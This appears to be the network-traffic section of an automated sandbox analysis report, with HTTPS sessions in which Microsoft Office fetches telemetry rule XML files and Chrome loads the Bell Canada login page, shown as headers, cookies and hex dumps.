                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      12192.168.2.94972313.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:52 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 36372762-501e-0078-6258-2b06cf000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131152Z-17c5cb586f672xmrz843mf85fn00000008dg00000000bmae
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      13192.168.2.94972513.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:52 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: c8022c20-501e-00a3-08ae-26c0f2000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131152Z-16849878b78km6fmmkbenhx76n00000008y00000000092k1
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      14192.168.2.94972413.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:52 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 6b0d144c-801e-007b-3a49-27e7ab000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131152Z-16849878b7828dsgct3vrzta700000000810000000007804
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      15192.168.2.94972613.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:52 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: d7faccb9-c01e-002b-307f-276e00000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131152Z-16849878b785jrf8dn0d2rczaw0000000arg00000000ahyn
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:52 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                      16192.168.2.94972913.107.246.45443
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:53 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                                                                                                      x-ms-request-id: 89d7e9f4-d01e-0066-46a8-2aea17000000
                                                                                                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                      x-azure-ref: 20241031T131153Z-16849878b78qwx7pmw9x5fub1c00000007t0000000004hve
                                                                                                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                      17192.168.2.949727206.47.98.2074433100C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC674OUTGET /Login?language=en HTTP/1.1
                                                                                                                                                                                                                                                                                                                                      Host: mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC5868INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                      Date: Thu, 31 Oct 2024 13:11:53 GMT
                                                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                                                      Expires: 0
                                                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: BSCC=LoginSplashReturnURL=%2fLogin%3flanguage%3den; domain=.bell.ca; expires=Wed, 29-Jan-2025 14:11:53 GMT; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: 8D711C5DA4B3704F0A5FE8ED0DB141222DFC87ED6AFE3A6E5F0F7DA8B5953F07F9198C1C7587982AE5FDA2B721188A3A=false; domain=.bell.ca; expires=Wed, 29-Jan-2025 14:11:53 GMT; path=/;SameSite=Lax; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: FPID=074d78d6-7e50-4974-a9af-c4727a62784e; domain=.bell.ca; expires=Sat, 31-Oct-2026 13:11:53 GMT; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: FPID_2=074d78d6-7e50-4974-a9af-c4727a62784e; domain=.bell.ca; expires=Sat, 31-Oct-2026 13:11:53 GMT; path=/; secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; domain=.bell.ca; expires=Thu, 31-Oct-2024 13:26:53 GMT; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: SessionCk=e60da217-072c-41c7-969e-7adbf82ba8be; domain=.bell.ca; expires=Thu, 31-Oct-2024 13:26:53 GMT; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: InActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; domain=.bell.ca; expires=Thu, 31-Oct-2024 13:41:53 GMT; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: ConsistentActivityCK=d0bb8c90-fdf6-4cf3-8894-a30039ae3a23; domain=.bell.ca; expires=Fri, 01-Nov-2024 01:11:53 GMT; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: OmniturePageName=Login:; domain=.bell.ca; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: __eccomp=; domain=.bell.ca; expires=Thu, 31-Oct-2024 14:11:53 GMT; path=/; secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: dtCookie=v_4_srv_8_sn_20124DC10D36CDE3D1C555C55D40CA36_perc_100000_ol_0_mul_1_app-3A429b1eac4514c5ce_1_rcs-3Acss_0; Path=/; Domain=.bell.ca; secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: CAD_Bell_ca_SS=967776428.47873.0000; path=/; Httponly; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: lanAkamaPro=A5IztOKSAQAAfK0hC-Sd8xQWQaTBAexuZE_ULjNr2v-63nNi-QEd9JDirAQvAa3--k2ucgHcwH8AAEB3AAAAAA|1|1|e91484a733d016678ba1bae1c170fcf9da65ba43; Path=/; Max-Age=1577847600; Domain=bell.ca; Secure
                                                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1
                                                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                      Content-Security-Policy: frame-ancestors bell.ca *.bell.ca *.bellmts.ca *.virginmobile.ca *.virginplus.ca *.vm.ca *.vmobile.ca *.vmcanada.com *.thesource.ca *.luckymobile.ca *.decibelinsight.net *.decibel.com; script-src https://*.bazaarvoice.com https://*.luckymobile.ca https://www.googletagmanager.com https://sc-static.net https://assets.adobedtm.com https://*.google-analytics.com https://*.postescanada-canadapost.ca https://*.nuance.com https://*.inq.com https://connect.facebook.net https://static.ads-twitter.com https://*.twitter.com https://ssl.geoplugin.net https://s.pinimg.com https://*.google.com https://*.gstatic.com https://*.vmobile.ca https://*.googleadservices.com https://*.stackadapt.com https://*.doubleclick.net https://*.virginplus.ca https://*.bell.ca https://*.tiktok.com https://*.know-where.com https://*.korem.com https://*.googleapis.com https://*.coveo.com https://siteimproveanalytics.com https://*.licdn.com https://mybell-qc.akamaized.net https://mybell-on.akamaized.net https://vldbellsu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                      X-OneAgent-JS-Injection: true
                                                                                                                                                                                                                                                                                                                                      X-ruxit-JS-Agent: true
                                                                                                                                                                                                                                                                                                                                      Bell-Geo: 1
                                                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                      X-Generated-By: Q-BC036
                                                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                      Server-Timing: dtSInfo;desc="0", dtRpid;desc="-1847303280"
                                                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://mybell.bell.ca
                                                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: Qjja3xkGs7=3789514188.64288.0000; path=/; Httponly; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLTSID=759A09CF47C23CE7804C25098E01FFA8; Path=/; Domain=.bell.ca
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLTSID=759A09CF47C23CE7804C25098E01FFA8; Path=/; Domain=.luckymobile.ca
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLTSID=759A09CF47C23CE7804C25098E01FFA8; Path=/; Domain=.virginplus.ca
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; Path=/; Domain=.bell.ca; Expires=Tue, 23-Jun-2026 13:11:53 GMT
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; Path=/; Domain=.luckymobile.ca
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLTUID=26A0122B5E2EB3DDD5D9EB8E4F02EA98; Path=/; Domain=.virginplus.ca
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP025e8c23=028702b9c92edae6af33052f2cad8391df3643e23d85a115a62dcd733137452f4305eb2ab8d3f82b8b13ae85a95e4a91df25ba1c299bcfdedb4de1548e72df9a4d727dc04ff7a4434f043a9549e2ae990e27c8fffcf8c51f6f45ef28d16623df71e944530154bdbbc943f1778729d75c23d5090b564224b9da5206df5702a68a73781d1fd1ececbd44594c5dd8c5b5254f6f1bde1d0a0592f816ed03e81d2a7361fff6316b97ddde987648e57932628c05ca645ec1dd7f856ec66444e629d0622a68b7e2c134f284f196ea3544cf3b7c82207a54921a6555f20de00c22b2c76ebcdc53eaee7e5f6b642a0290d9cec5131cd8fb109ee0df2b3f4778939a7789ac78056fb9410029bd6003a59e231a02b1e37dbc7850fd5bd1f084ade389122c5bd439ff5038520f0b6ac30f03e31c23ca7289d6d59979f12f660f3dbeb3c0f974d1ad06761c0eda4704077fb3cf009e2239d228a2b96806fe5c793a3730769749ad8989123b; Path=/; Domain=.bell.ca; Secure; HttpOnly;
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP02ce4a58=028702b9c9eb9d45fa93071ef814195a8dde49c75485a115a62dcd733137452f4305eb2ab84ad0304b853df666ee8067949b77e117b7c25e5473c6b8c7698691dc7ec76a81; path=/; domain=bell.ca; HttpOnly; Secure
                                                                                                                                                                                                                                                                                                                                      Set-Cookie: TLP409c8162028=08e8c5f15aab2000b6d5af39e455c3dba139d8d53047ea78592ce399b79fe3838682a55060682f3c0814d2c87c113000eba996927cc9b33213252a01388c1491d9327dcd5d217f56d8302374cd353da244286fb3225f8c67d750ec72fed0eaec; Path=/
                                                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                      2024-10-31 13:11:53 UTC10516INData Raw: 33 30 62 30 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 69 64 3d 22 6d 79 42 65 6c 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 62 65 6c 6c 5f 63 6f 6d 6d 6f 6e 2e 6a 73 3f 63 61 63 68 65 22 3e 0a 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 73
                                                                                                                                                                                                                                                                                                                                      Data Ascii: 30b0<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html id="myBell" lang="en"><head><script type="text/javascript" src="/static/bell_common.js?cache"></script><script type="text/javascript" src="/s
